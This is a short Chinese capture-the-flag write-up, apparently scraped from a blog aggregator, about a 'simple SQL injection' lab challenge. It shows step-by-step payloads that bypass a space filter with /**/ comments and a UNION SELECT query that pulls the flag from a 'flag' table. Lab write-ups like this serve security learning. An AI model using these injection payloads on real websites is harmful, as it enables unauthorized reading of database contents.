文章标题

来源:互联网 发布:matlab把向量变成矩阵 编辑:程序博客网 时间:2024/06/02 05:16

实验吧之简单的SQL注入

  1. 输入1 观察输出信息
    这里写图片描述
    显示出ID值和name,可判断出ID是注入点

  2. 输入1 and 1=1 和 1 and 1=2
    这里写图片描述
    这里写图片描述
    怀疑过滤了and等关键字
    再输入1and1=1
    这里写图片描述
    可以确定被过滤的是空格

  3. 绕过空格的方式有一对英文()或者一对注释符/**/
    故可构造1/* * /and/**/1=1
    这里写图片描述

  4. 猜测flag在flag表中
    因此有1’/* * /union/* * /select/* * /flag/ * * /from/ * * /flag/ * * /where/ * * /’1’=’1 (注意单引号需闭合)
    这里写图片描述
    得到flag。

原创粉丝点击